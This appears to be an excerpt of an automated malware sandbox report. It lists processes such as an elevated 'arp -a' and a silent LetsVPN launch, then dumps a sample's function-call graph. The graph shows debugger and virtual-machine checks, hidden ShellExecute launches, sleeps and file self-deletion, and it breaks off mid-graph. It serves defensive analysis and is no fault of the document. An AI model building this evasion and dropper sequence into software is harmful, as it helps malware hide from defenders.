                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:72
                                                                                                                                                                                                  Start time:10:15:30
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:73
                                                                                                                                                                                                  Start time:10:15:30
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\ARP.EXE
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:arp -a
                                                                                                                                                                                                  Imagebase:0xe20000
                                                                                                                                                                                                  File size:22'528 bytes
                                                                                                                                                                                                  MD5 hash:4D3943EDBC9C7E18DC3469A21B30B3CE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:75
                                                                                                                                                                                                  Start time:10:15:36
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent
                                                                                                                                                                                                  Imagebase:0x70000
                                                                                                                                                                                                  File size:1'588'256 bytes
                                                                                                                                                                                                  MD5 hash:56162A01D3DE7CB90EB9A2222C6B8F24
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                    Execution Coverage:6.6%
                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                    Signature Coverage:16.2%
                                                                                                                                                                                                    Total number of Nodes:1394
                                                                                                                                                                                                    Total number of Limit Nodes:25
                                                                                                                                                                                                    execution_graph 16510 180003102 ExitProcess 16511 180008644 IsDebuggerPresent 16512 180008652 16511->16512 16514 180008657 16511->16514 16515 180006940 GetSystemInfo 16512->16515 16516 18000696b 16515->16516 16517 18000696f GlobalMemoryStatusEx 16515->16517 16520 180012200 16516->16520 16517->16516 16522 180012209 16520->16522 16521 1800069a3 16521->16514 16522->16521 16525 180027f26 IsProcessorFeaturePresent 16522->16525 16526 18002a2b0 16525->16526 16527 180012545 16528 1800125d4 16527->16528 16541 180012558 _calloc_crt 16527->16541 16529 18001693c _callnewh DecodePointer 16528->16529 16530 1800125d9 16529->16530 16532 180015dc8 _errno 3 API calls 16530->16532 16531 180012570 16531->16541 16543 180019254 16531->16543 16552 1800192c8 16531->16552 16578 180010b34 16531->16578 16534 1800125c9 16532->16534 16536 1800125b9 16583 180015dc8 16536->16583 16540 1800125be 16542 180015dc8 _errno 3 API calls 16540->16542 16541->16531 16541->16534 16541->16536 16541->16540 16581 18001693c DecodePointer 16541->16581 16542->16534 16586 180020d84 16543->16586 16546 180019271 16548 1800192c8 _NMSG_WRITE 7 API calls 16546->16548 16550 180019292 16546->16550 16547 180020d84 _set_error_mode 5 API calls 16547->16546 16549 180019288 16548->16549 16551 1800192c8 _NMSG_WRITE 7 API calls 16549->16551 16550->16531 16551->16550 16553 1800192fc _NMSG_WRITE 16552->16553 16554 180020d84 _set_error_mode 5 API calls 16553->16554 16560 180019421 std::system_error::system_error _NMSG_WRITE 16553->16560 16556 180019312 16554->16556 16555 180012200 std::system_error::system_error IsProcessorFeaturePresent 16557 1800194b3 16555->16557 16558 180019438 GetStdHandle 16556->16558 16559 180020d84 _set_error_mode 5 API calls 16556->16559 16557->16531 16558->16560 16561 180019323 16559->16561 16560->16555 16561->16558 16562 180019334 16561->16562 16562->16560 16563 180019523 16562->16563 16564 180019369 GetModuleFileNameW 16562->16564 16566 180016d1c _invoke_watson IsProcessorFeaturePresent 16563->16566 16565 18001938e 16564->16565 16571 1800193a7 LangCountryEnumProc 16564->16571 16568 1800194d0 16565->16568 16565->16571 16567 180019536 16566->16567 16569 180016d1c _invoke_watson IsProcessorFeaturePresent 16568->16569 16570 1800194e4 16569->16570 16574 180016d1c _invoke_watson IsProcessorFeaturePresent 16570->16574 16571->16570 16572 1800193f1 16571->16572 16572->16560 16573 18001950e 16572->16573 16576 1800194f9 16572->16576 16575 180016d1c _invoke_watson IsProcessorFeaturePresent 16573->16575 16574->16576 16575->16563 16577 180016d1c _invoke_watson IsProcessorFeaturePresent 16576->16577 16577->16573 16604 180010af0 GetModuleHandleExW 16578->16604 16580 180010b41 ExitProcess 16582 180016957 16581->16582 16582->16541 16606 18001a380 16583->16606 16585 180015dd1 16585->16540 16587 180020d8c 16586->16587 16588 180015dc8 _errno 3 API calls 16587->16588 16589 180019262 16587->16589 16590 180020db1 16588->16590 16589->16546 16589->16547 16592 180016cfc 16590->16592 16595 180016c94 DecodePointer 16592->16595 16596 180016cd2 16595->16596 16601 180016d1c 16596->16601 16602 180027f26 _invoke_watson IsProcessorFeaturePresent 16601->16602 16603 180016d2a 16602->16603 16605 180010b10 _init_pointers 16604->16605 16605->16580 16607 18001a390 _read_nolock 16606->16607 16616 1800157f0 16607->16616 16609 18001a39d 16610 18001a3cf _initptd __security_init_cookie _getptd_noexit 16609->16610 16611 180015060 _calloc_crt TlsGetValue TlsSetValue DecodePointer 16609->16611 16610->16585 16612 18001a3b2 16611->16612 16612->16610 16613 18001580c _mtinit TlsSetValue 16612->16613 16614 18001a3c8 16613->16614 16614->16610 16615 180011058 free TlsGetValue TlsSetValue DecodePointer 16614->16615 16615->16610 16617 180015803 TlsGetValue 16616->16617 16618 180015800 16616->16618 16619 18002a300 16617->16619 16618->16617 16620 18000ccc8 16621 18000ccd6 16620->16621 16622 18000ccf6 16620->16622 16621->16622 16623 18000ccdc SetFilePointer 16621->16623 16623->16622 16624 18000a40a 16625 18000a41d 16624->16625 16639 18000a413 16624->16639 16626 18000a42b 16625->16626 16689 18000cdd4 16625->16689 16629 18000a441 16626->16629 16626->16639 16695 18000ceac 16626->16695 16627 180012200 std::system_error::system_error IsProcessorFeaturePresent 16630 18000a753 16627->16630 16632 18000a453 16629->16632 16699 18000cf08 16629->16699 16654 180009bbc 16632->16654 16636 18000a46b 16637 180009a9c 3 API calls 16636->16637 16636->16639 16637->16639 16638 18000a5cb 16638->16639 16640 18000a601 _NMSG_WRITE 16638->16640 16703 18000eb24 16638->16703 16639->16627 16650 18000a658 __termconin 16640->16650 16652 18000a666 SetFileTime 16640->16652 16684 18000d334 16640->16684 16642 18000a4f3 16644 18000a53e wsprintfW 16642->16644 16646 18000a58d 16644->16646 16645 18000a56d wsprintfW 16645->16646 16675 180009a9c 16646->16675 16648 18000a4ab wcscpy 16648->16638 16648->16642 16648->16644 16648->16645 16653 18000a76f 16648->16653 16651 18000cdd4 3 API calls 16650->16651 16651->16639 16652->16650 16655 180009c02 16654->16655 16659 180009c26 type_info::operator== memcpy_s 16654->16659 16658 18000cdd4 3 API calls 16655->16658 16655->16659 16660 180009c19 16655->16660 16656 180012200 std::system_error::system_error IsProcessorFeaturePresent 16657 18000a0b4 16656->16657 16657->16636 16657->16648 16658->16660 16659->16656 16660->16659 16661 180009c89 16660->16661 16662 18000ceac SetFilePointer 16660->16662 16663 180009c9c 16661->16663 16664 18000cf08 SetFilePointer 16661->16664 16662->16661 16713 18000ce60 16663->16713 16664->16661 16668 180009cdb 16668->16659 16719 18000cc4c 16668->16719 16671 18000eb24 std::ios_base::_Init 6 API calls 16672 180009d14 _read_nolock wcscpy wcsstr 16671->16672 16672->16659 16723 18000a918 SystemTimeToFileTime 16672->16723 16676 180009ae0 memcpy_s 16675->16676 16677 180009b91 16676->16677 16680 180009b5a wcscat wcscpy 16676->16680 16681 180009bb4 16676->16681 16678 180012200 std::system_error::system_error IsProcessorFeaturePresent 16677->16678 16679 180009ba1 CreateFileW 16678->16679 16679->16638 16682 180009b74 GetFileAttributesW 16680->16682 16682->16677 16683 180009b84 CreateDirectoryW 16682->16683 16683->16677 16687 18000d35e 16684->16687 16685 18000cc4c SetFilePointer 16685->16687 16687->16685 16688 18000d366 16687->16688 16734 18000addc 16687->16734 16688->16640 16690 18000cdf4 16689->16690 16694 18000cded 16689->16694 16691 18000ce23 16690->16691 16690->16694 16757 180011058 16690->16757 16693 180011058 free 3 API calls 16691->16693 16693->16694 16694->16626 16696 18000cec5 16695->16696 16697 18000cec0 16695->16697 16698 18000d780 SetFilePointer 16696->16698 16697->16629 16698->16697 16700 18000cf21 16699->16700 16701 18000cf1c 16699->16701 16700->16701 16702 18000d780 SetFilePointer 16700->16702 16701->16629 16702->16701 16705 18000eb2f 16703->16705 16704 18000eb48 16704->16640 16705->16704 16706 18001693c _callnewh DecodePointer 16705->16706 16707 18000eb4e std::_Xbad_alloc 16705->16707 16706->16705 16761 180011998 16707->16761 16709 18000eb8c 16766 180015060 16709->16766 16712 18000ebc2 16712->16640 16726 18000d780 16713->16726 16715 180009cc4 16716 18000d5bc 16715->16716 16717 18000cc4c SetFilePointer 16716->16717 16718 18000d5fc 16717->16718 16718->16668 16720 18000cc58 16719->16720 16722 180009cfb 16719->16722 16721 18000cc7f SetFilePointer 16720->16721 16720->16722 16721->16722 16722->16659 16722->16671 16724 180012200 std::system_error::system_error IsProcessorFeaturePresent 16723->16724 16725 180009ec0 LocalFileTimeToFileTime 16724->16725 16725->16659 16727 18000d7b5 16726->16727 16732 18000d7ad 16726->16732 16728 18000cc4c SetFilePointer 16727->16728 16731 18000d7c6 16728->16731 16729 18000cc4c SetFilePointer 16730 18000d9c5 16729->16730 16730->16732 16733 18000cc4c SetFilePointer 16730->16733 16731->16729 16731->16730 16732->16715 16733->16732 16736 18000ae01 16734->16736 16737 18000ae51 16734->16737 16736->16737 16738 18000b35c 16736->16738 16737->16687 16741 18000b395 memcpy_s 16738->16741 16740 18000b71d 16741->16740 16743 18000c7d0 16741->16743 16747 18000c8a4 16741->16747 16744 18000c810 16743->16744 16745 18000c818 16744->16745 16753 18000a9b0 16744->16753 16745->16741 16748 18000c8e9 16747->16748 16749 18000a9b0 IsProcessorFeaturePresent 16748->16749 16752 18000c8f1 16748->16752 16750 18000c94a 16749->16750 16751 18000a9b0 IsProcessorFeaturePresent 16750->16751 16750->16752 16751->16752 16752->16741 16756 18000aa34 _ld12tod 16753->16756 16754 180012200 std::system_error::system_error IsProcessorFeaturePresent 16755 18000adbf 16754->16755 16755->16745 16756->16754 16756->16756 16758 18001105d free 16757->16758 16760 18001107d _read_nolock _dosmaperr 16757->16760 16759 180015dc8 _errno 3 API calls 16758->16759 16758->16760 16759->16760 16760->16691 16762 1800119e1 16761->16762 16763 1800119f7 RtlPcToFileHeader 16761->16763 16762->16763 16764 180011a37 RaiseException 16763->16764 16765 180011a1c 16763->16765 16764->16709 16765->16764 16769 180015085 16766->16769 16768 18000eba3 EncodePointer 16768->16712 16769->16768 16770 18001cb6c 16769->16770 16771 18001cb81 16770->16771 16772 18001cb9e _calloc_crt 16770->16772 16771->16772 16773 18001cb8f 16771->16773 16775 18001693c _callnewh DecodePointer 16772->16775 16776 18001cb94 16772->16776 16774 180015dc8 _errno 3 API calls 16773->16774 16774->16776 16775->16772 16776->16769 16777 180009aca GetFileAttributesW 16778 180009ad5 CreateDirectoryW 16777->16778 16782 180009ae0 memcpy_s 16777->16782 16778->16782 16779 180009b91 16780 180012200 std::system_error::system_error IsProcessorFeaturePresent 16779->16780 16781 180009ba1 16780->16781 16782->16779 16783 180009b5a wcscat wcscpy 16782->16783 16784 180009bb4 16782->16784 16785 180009b74 GetFileAttributesW 16783->16785 16785->16779 16786 180009b84 CreateDirectoryW 16785->16786 16786->16779 16787 180001170 LoadLibraryA 16788 18000a171 16789 18000a177 wcscat 16788->16789 16790 18000a191 SetFilePointer 16789->16790 16791 18000a1ab 16789->16791 16790->16791 16792 18000a1a4 16790->16792 16795 18000ca80 16791->16795 16794 18000a1be 16792->16794 16796 18000cab1 16795->16796 16797 18000cabf 16795->16797 16796->16794 16798 18000cb0f SetFilePointer 16797->16798 16799 18000cb32 16797->16799 16800 18000cad8 CreateFileW 16797->16800 16798->16799 16802 18000eb24 std::ios_base::_Init 6 API calls 16799->16802 16800->16796 16800->16798 16803 18000cb3c 16802->16803 16803->16796 16804 18000cb80 SetFilePointer 16803->16804 16804->16796 16805 18000583a 16807 180005846 16805->16807 16914 180002028 16807->16914 16809 180005b94 16924 1800018e4 16809->16924 16811 180005c20 LoadLibraryW 16930 18002a158 16811->16930 16813 180005ca1 ShellExecuteW LoadLibraryW 16815 18002a158 _init_pointers 16813->16815 16816 180005d5b Sleep DeleteFileW 16815->16816 16817 180005d91 16816->16817 16819 180002f78 8 API calls 16817->16819 16820 180005dab 16819->16820 16821 180003b3c 10 API calls 16820->16821 16822 180005dba 16821->16822 16823 1800016d0 8 API calls 16822->16823 16824 180005dce 16823->16824 16825 1800015f4 8 API calls 16824->16825 16829 180005de1 16825->16829 16827 180005937 16827->16809 16932 180005394 16827->16932 16950 1800014c4 16827->16950 16954 18000151c 16827->16954 16958 180001220 16827->16958 16966 180001a20 16827->16966 16830 180005e6a CreateDirectoryW 16829->16830 16831 180005eb1 16830->16831 16832 180002f78 8 API calls 16831->16832 16833 180005ecb 16832->16833 16834 180001808 8 API calls 16833->16834 16835 180005ee8 16834->16835 16836 1800015f4 8 API calls 16835->16836 16837 180005efb 16836->16837 16838 1800016d0 8 API calls 16837->16838 16839 180005f12 16838->16839 16840 180006b28 19 API calls 16839->16840 16841 180005fc4 Sleep 16840->16841 16842 180005ff8 LangCountryEnumProc 16841->16842 16843 180005638 8 API calls 16842->16843 16844 180006014 16843->16844 16845 180003e68 10 API calls 16844->16845 16846 180006029 16845->16846 16847 180001808 8 API calls 16846->16847 16848 1800060b6 16847->16848 16849 1800016d0 8 API calls 16848->16849 16850 1800060cd 16849->16850 16851 1800018e4 8 API calls 16850->16851 16852 18000612c 16851->16852 16853 180001808 8 API calls 16852->16853 16854 18000616f 16853->16854 16855 180001808 8 API calls 16854->16855 16856 18000618a 16855->16856 16857 180001808 8 API calls 16856->16857 16858 1800061a5 16857->16858 16859 180001808 8 API calls 16858->16859 16860 1800061c0 16859->16860 16861 180001808 8 API calls 16860->16861 16862 18000620b 16861->16862 16863 1800016d0 8 API calls 16862->16863 16864 180006222 16863->16864 16865 1800018e4 8 API calls 16864->16865 16866 1800062a1 16865->16866 16867 180003b3c 10 API calls 16866->16867 16868 180006399 16867->16868 16869 1800016d0 8 API calls 16868->16869 16870 1800063b0 16869->16870 16871 1800016d0 8 API calls 16870->16871 16872 1800063c7 16871->16872 16873 180003b3c 10 API calls 16872->16873 16874 180006427 16873->16874 16875 1800016d0 8 API calls 16874->16875 16876 18000643e 16875->16876 16877 1800016d0 8 API calls 16876->16877 16878 180006455 16877->16878 16879 180003b3c 10 API calls 16878->16879 16880 1800064a9 16879->16880 16881 18000547c std::system_error::system_error 8 API calls 16880->16881 16882 1800064f1 16881->16882 16883 180005540 8 API calls 16882->16883 16884 180006525 16883->16884 16885 180005540 8 API calls 16884->16885 16886 180006549 16885->16886 16887 180006561 Sleep ShellExecuteW Sleep 16886->16887 16888 18000661e LangCountryEnumProc 16887->16888 16889 180005638 8 API calls 16888->16889 16890 180006645 LangCountryEnumProc 16889->16890 16891 180005638 8 API calls 16890->16891 16892 180006697 16891->16892 16893 180005638 8 API calls 16892->16893 16894 1800066bb 16893->16894 16895 180002270 8 API calls 16894->16895 16896 1800066cf 16895->16896 16897 18000310c 22 API calls 16896->16897 16898 1800066ea Sleep 16897->16898 16899 180002270 8 API calls 16898->16899 16900 18000672b 16899->16900 16901 180002270 8 API calls 16900->16901 16902 18000673d 16901->16902 16903 180002270 8 API calls 16902->16903 16904 18000674c 16903->16904 16905 180002270 8 API calls 16904->16905 16906 180006771 16905->16906 16907 18000310c 22 API calls 16906->16907 16908 180006783 DeleteFileW DeleteFileW DeleteFileW 16907->16908 16909 1800067e9 16908->16909 16910 18000286c 8 API calls 16909->16910 16911 1800068dd std::ios_base::_Ios_base_dtor 16910->16911 16912 180012200 std::system_error::system_error IsProcessorFeaturePresent 16911->16912 16913 18000691d 16912->16913 16915 18000205e 16914->16915 16974 180007e68 16915->16974 16919 1800020e3 std::ios_base::_Init 16988 180008668 16919->16988 16921 180002119 16923 180002143 16921->16923 16994 1800069ac 16921->16994 16923->16827 16926 18000192c LangCountryEnumProc 16924->16926 16925 180001959 LangCountryEnumProc 17875 180005280 16925->17875 16926->16925 17883 180004660 16926->17883 16929 180001992 16929->16811 16931 18002a167 16930->16931 16933 180005461 16932->16933 16934 1800053be 16932->16934 17901 18000e13c 16933->17901 16935 1800053f9 16934->16935 16936 1800053cd 16934->16936 16940 180004594 std::_System_error::_System_error 8 API calls 16935->16940 16938 1800053db 16936->16938 16939 18000546d 16936->16939 17896 18000772c 16938->17896 16941 18000e13c std::_System_error::_System_error 7 API calls 16939->16941 16943 1800053f7 memcpy_s 16940->16943 16944 18000547a 16941->16944 16943->16827 16945 1800054e5 16944->16945 16948 1800054c0 16944->16948 16946 180004594 std::_System_error::_System_error 8 API calls 16945->16946 16947 1800054e3 memcpy_s 16946->16947 16947->16827 16949 180005394 std::_System_error::_System_error 8 API calls 16948->16949 16949->16947 16951 1800014e6 std::system_error::system_error 16950->16951 17906 180008090 16951->17906 16953 1800014fe std::_System_error::_System_error 16953->16827 16955 180001564 std::system_error::system_error 16954->16955 16956 180001591 std::system_error::system_error 16955->16956 16957 180004594 std::_System_error::_System_error 8 API calls 16955->16957 16956->16827 16957->16956 16959 180001262 16958->16959 17942 180002560 16959->17942 16962 1800069ac std::ios_base::_Init 11 API calls 16963 1800013e5 16962->16963 16964 1800013f9 16963->16964 17946 180004c20 16963->17946 16964->16827 16967 180001a4b std::ios_base::getloc 16966->16967 16968 180001e28 20 API calls 16967->16968 16969 180001a54 16968->16969 17958 180008d60 16969->17958 16972 180007a80 11 API calls 16973 180001a97 16972->16973 16973->16827 17015 1800048e0 16974->17015 16976 180007e8f std::ios_base::getloc 17022 180001e28 16976->17022 16979 180007efa 16981 1800020b7 16979->16981 17036 18000e840 16979->17036 16980 1800069ac std::ios_base::_Init 11 API calls 16980->16979 16983 18000215c 16981->16983 16984 18000eb24 std::ios_base::_Init 6 API calls 16983->16984 16985 18000217d 16984->16985 16986 18000e574 std::locale::_Init 8 API calls 16985->16986 16987 18000218c 16985->16987 16986->16987 16987->16919 16989 18000868a 16988->16989 16993 1800086c3 16988->16993 17538 18000ea80 16989->17538 16991 180008697 std::ios_base::_Init 16991->16993 17546 180001cf8 16991->17546 16993->16921 16995 1800069f4 16994->16995 16997 1800069c2 16994->16997 16995->16923 16996 1800069c7 16998 1800069da 16996->16998 17799 18000261c 16996->17799 16997->16996 16999 180011998 _CxxThrowException 2 API calls 16997->16999 17001 1800069f2 16998->17001 17003 18000261c std::system_error::system_error 8 API calls 16998->17003 16999->16996 17006 18000261c std::system_error::system_error 8 API calls 17001->17006 17005 180006a4c 17003->17005 17004 180011998 _CxxThrowException 2 API calls 17004->16998 17007 180011998 _CxxThrowException 2 API calls 17005->17007 17008 180006a74 17006->17008 17007->17001 17009 180011998 _CxxThrowException 2 API calls 17008->17009 17010 180006a8f 17009->17010 17012 180006ab6 std::ios_base::_Init 17010->17012 17807 180004250 17010->17807 17013 180006b13 17012->17013 17014 1800069ac std::ios_base::_Init 11 API calls 17012->17014 17013->16923 17014->17013 17016 1800069ac std::ios_base::_Init 11 API calls 17015->17016 17017 180004923 17016->17017 17018 18000eb24 std::ios_base::_Init 6 API calls 17017->17018 17019 18000492d 17018->17019 17020 18000493c 17019->17020 17040 18000e574 17019->17040 17020->16976 17023 180001e4e std::_Lockit::_Lockit 17022->17023 17026 18000df9c std::_Lockit::~_Lockit LeaveCriticalSection 17023->17026 17028 180001e9d 17023->17028 17024 180001ee4 17025 18000df9c std::_Lockit::~_Lockit LeaveCriticalSection 17024->17025 17027 180001f47 17025->17027 17026->17028 17027->16979 17027->16980 17028->17024 17069 1800044b0 17028->17069 17031 180001f1e 17082 18000e538 17031->17082 17035 180011998 _CxxThrowException 2 API calls 17035->17031 17037 18000e858 std::_Lockit::_Lockit 17036->17037 17038 18000df9c std::_Lockit::~_Lockit LeaveCriticalSection 17037->17038 17039 18000e8a8 17038->17039 17039->16981 17041 18000e597 std::_Lockit::_Lockit 17040->17041 17043 18000e5cd 17041->17043 17050 18000e71c 17041->17050 17063 18000df9c 17043->17063 17047 18000e604 17047->17020 17051 18000eb24 std::ios_base::_Init 6 API calls 17050->17051 17052 18000e733 17051->17052 17053 18000e5ab 17052->17053 17054 18000e468 _Yarn 3 API calls 17052->17054 17055 18000e788 17053->17055 17054->17053 17056 18000e79a 17055->17056 17057 18000e5b6 17055->17057 17066 18000eab0 17056->17066 17059 18000e468 17057->17059 17060 18000e485 17059->17060 17062 18000e48f memcpy_s 17059->17062 17061 180011058 free 3 API calls 17060->17061 17060->17062 17061->17062 17062->17043 17064 18000dfa7 17063->17064 17064->17047 17065 1800131e4 LeaveCriticalSection 17064->17065 17067 18000eae7 17066->17067 17068 18000eac0 EncodePointer 17066->17068 17068->17057 17070 180001ef6 17069->17070 17071 1800044e9 17069->17071 17070->17031 17079 18001176c 17070->17079 17071->17070 17072 18000eb24 std::ios_base::_Init 6 API calls 17071->17072 17073 1800044fa 17072->17073 17074 18000454f 17073->17074 17085 18000234c 17073->17085 17074->17070 17107 180002a5c 17074->17107 17080 180011798 std::exception::exception 5 API calls 17079->17080 17081 180001f0d 17080->17081 17081->17035 17083 18000eb24 std::ios_base::_Init 6 API calls 17082->17083 17084 18000e54b 17083->17084 17084->17024 17086 180002371 std::_Lockit::_Lockit 17085->17086 17087 1800023dd 17086->17087 17122 180011798 17086->17122 17125 18000e68c 17087->17125 17092 180011998 _CxxThrowException 2 API calls 17092->17087 17534 18000e6f8 17107->17534 17110 180002a78 17112 180002a8b 17110->17112 17113 180011058 free 3 API calls 17110->17113 17111 180011058 free 3 API calls 17111->17110 17114 180002a9e 17112->17114 17116 180011058 free 3 API calls 17112->17116 17113->17112 17115 180002ab1 17114->17115 17117 180011058 free 3 API calls 17114->17117 17118 180002ac4 17115->17118 17119 180011058 free 3 API calls 17115->17119 17116->17114 17117->17115 17120 180002ad7 17118->17120 17121 180011058 free 3 API calls 17118->17121 17119->17118 17121->17120 17132 1800118a0 17122->17132 17145 180015264 17125->17145 17127 18000e6a5 17128 18000e468 _Yarn 3 API calls 17127->17128 17129 18000e6bf 17128->17129 17130 180015264 setlocale 16 API calls 17129->17130 17131 18000e6ce 17129->17131 17130->17131 17133 1800023c0 17132->17133 17134 1800118a5 std::system_error::system_error 17132->17134 17133->17092 17134->17133 17136 180018b90 17134->17136 17137 180018ba5 17136->17137 17138 180018b9b 17136->17138 17139 180015dc8 _errno 3 API calls 17137->17139 17138->17137 17143 180018bc1 17138->17143 17140 180018bad 17139->17140 17141 180016cfc _invalid_parameter_noinfo 2 API calls 17140->17141 17142 180018bb9 17141->17142 17142->17133 17143->17142 17144 180015dc8 _errno 3 API calls 17143->17144 17144->17140 17146 180015296 17145->17146 17147 18001532f 17145->17147 17180 18001d8c0 17146->17180 17183 18001c278 17147->17183 17150 18001533b 17152 180011058 free 3 API calls 17150->17152 17154 180015346 17152->17154 17153 18001531a 17155 180016d1c _invoke_watson IsProcessorFeaturePresent 17153->17155 17176 1800152cf 17154->17176 17202 18001a35c 17154->17202 17155->17147 17156 180015060 _calloc_crt 3 API calls 17157 1800152c7 17156->17157 17160 18001d8c0 _Wcsftime 16 API calls 17157->17160 17157->17176 17162 1800152ee 17160->17162 17163 180015306 17162->17163 17165 1800152f8 17162->17165 17167 180016d1c _invoke_watson IsProcessorFeaturePresent 17163->17167 17164 1800154a3 17166 180016d1c _invoke_watson IsProcessorFeaturePresent 17164->17166 17165->17147 17168 1800152fc 17165->17168 17166->17176 17167->17153 17169 180011058 free 3 API calls 17168->17169 17169->17176 17170 180015391 17170->17164 17171 18001dc10 _wcstombs_s_l 16 API calls 17170->17171 17170->17176 17172 1800153eb 17171->17172 17173 18001548e 17172->17173 17175 1800153fd 17172->17175 17174 180016d1c _invoke_watson IsProcessorFeaturePresent 17173->17174 17174->17164 17177 180011058 free 3 API calls 17175->17177 17178 18001543f 17175->17178 17176->17127 17177->17178 17178->17176 17179 180011058 free 3 API calls 17178->17179 17179->17176 17221 18001d790 17180->17221 17184 18001c2b5 17183->17184 17185 18001c29e 17183->17185 17186 18001a35c _getptd 16 API calls 17184->17186 17187 180015dc8 _errno 3 API calls 17185->17187 17188 18001c2ba 17186->17188 17189 18001c2a3 17187->17189 17264 18001b814 17188->17264 17191 180016cfc _invalid_parameter_noinfo 2 API calls 17189->17191 17198 18001c2ae 17191->17198 17193 180015060 _calloc_crt 3 API calls 17194 18001c2dd _copytlocinfo_nolock 17193->17194 17195 18001c3de 17194->17195 17197 18001c330 ProcessCodePage 17194->17197 17194->17198 17278 18001b5d8 17195->17278 17274 18001b88c 17197->17274 17198->17150 17200 18001c37a 17200->17198 17201 18001b88c _updatetlocinfoEx_nolock 3 API calls 17200->17201 17201->17198 17203 18001a380 _getptd_noexit 3 API calls 17202->17203 17204 18001a367 17203->17204 17205 180015350 17204->17205 17206 180010c94 _amsg_exit 16 API calls 17204->17206 17207 18001dc10 17205->17207 17206->17205 17211 18001dc39 17207->17211 17208 18001dc8f 17209 180015dc8 _errno 3 API calls 17208->17209 17210 18001dc94 17209->17210 17213 180016cfc _invalid_parameter_noinfo 2 API calls 17210->17213 17211->17208 17212 18001dc63 17211->17212 17485 18001d8e0 17212->17485 17217 18001dc86 17213->17217 17216 18001dc79 17218 180015dc8 _errno 3 API calls 17216->17218 17217->17170 17218->17217 17219 18001dca4 17219->17217 17220 180015dc8 _errno 3 API calls 17219->17220 17220->17210 17222 18001d7c0 17221->17222 17223 18001d7e2 17222->17223 17224 18001d7c5 17222->17224 17242 18001230c 17223->17242 17225 180015dc8 _errno 3 API calls 17224->17225 17226 18001d7d1 17225->17226 17228 180016cfc _invalid_parameter_noinfo 2 API calls 17226->17228 17237 1800152af 17228->17237 17229 18001d800 17230 18001d824 17229->17230 17231 18001d818 17229->17231 17248 18001d5b4 17230->17248 17232 180015dc8 _errno 3 API calls 17231->17232 17235 18001d81d 17232->17235 17234 18001d834 17236 18001d83a 17234->17236 17240 18001d84c 17234->17240 17238 180016cfc _invalid_parameter_noinfo 2 API calls 17235->17238 17239 180015dc8 _errno 3 API calls 17236->17239 17237->17153 17237->17156 17238->17237 17239->17237 17240->17237 17241 180015dc8 _errno 3 API calls 17240->17241 17241->17235 17243 180012322 17242->17243 17247 18001235c 17242->17247 17244 18001a35c _getptd 16 API calls 17243->17244 17245 180012327 17244->17245 17246 18001b814 ___lc_locale_name_func 16 API calls 17245->17246 17245->17247 17246->17247 17247->17229 17249 18001d5e5 17248->17249 17250 18001d613 17249->17250 17251 18001d5fa 17249->17251 17258 18001d5ea std::system_error::system_error 17249->17258 17252 18001230c _LocaleUpdate::_LocaleUpdate 16 API calls 17250->17252 17253 180015dc8 _errno TlsGetValue TlsSetValue DecodePointer 17251->17253 17254 18001d620 17252->17254 17255 18001d5ff 17253->17255 17257 18001d70d _read_nolock 17254->17257 17262 18001d62e _read_nolock 17254->17262 17256 180016cfc _invalid_parameter_noinfo DecodePointer IsProcessorFeaturePresent 17255->17256 17256->17258 17257->17258 17259 180015dc8 _errno TlsGetValue TlsSetValue DecodePointer 17257->17259 17258->17234 17259->17258 17260 18001d6cb _read_nolock 17260->17258 17261 180015dc8 _errno TlsGetValue TlsSetValue DecodePointer 17260->17261 17261->17258 17262->17258 17262->17260 17263 18001b9cc _isleadbyte_l 16 API calls 17262->17263 17263->17262 17265 18001b81f 17264->17265 17266 18001a35c _getptd 16 API calls 17264->17266 17267 18001b83a 17265->17267 17268 18001b848 17265->17268 17266->17265 17269 18001a35c _getptd 16 API calls 17267->17269 17270 18001b88c _updatetlocinfoEx_nolock 3 API calls 17268->17270 17271 18001b83f 17269->17271 17270->17271 17272 18001b880 17271->17272 17302 180010c94 17271->17302 17272->17193 17275 18001b8dc 17274->17275 17276 18001b89e __addlocaleref 17274->17276 17275->17200 17276->17275 17277 18001b5d8 __freetlocinfo 3 API calls 17276->17277 17277->17275 17279 18001b674 17278->17279 17282 18001b5fb 17278->17282 17280 18001b6c7 17279->17280 17281 180011058 free 3 API calls 17279->17281 17298 18001b6f4 17280->17298 17309 180021de4 17280->17309 17283 18001b698 17281->17283 17282->17279 17285 18001b62e 17282->17285 17289 180011058 free 3 API calls 17282->17289 17286 180011058 free 3 API calls 17283->17286 17287 18001b650 17285->17287 17296 180011058 free 3 API calls 17285->17296 17290 18001b6ac 17286->17290 17291 180011058 free 3 API calls 17287->17291 17289->17285 17295 180011058 free 3 API calls 17290->17295 17297 18001b668 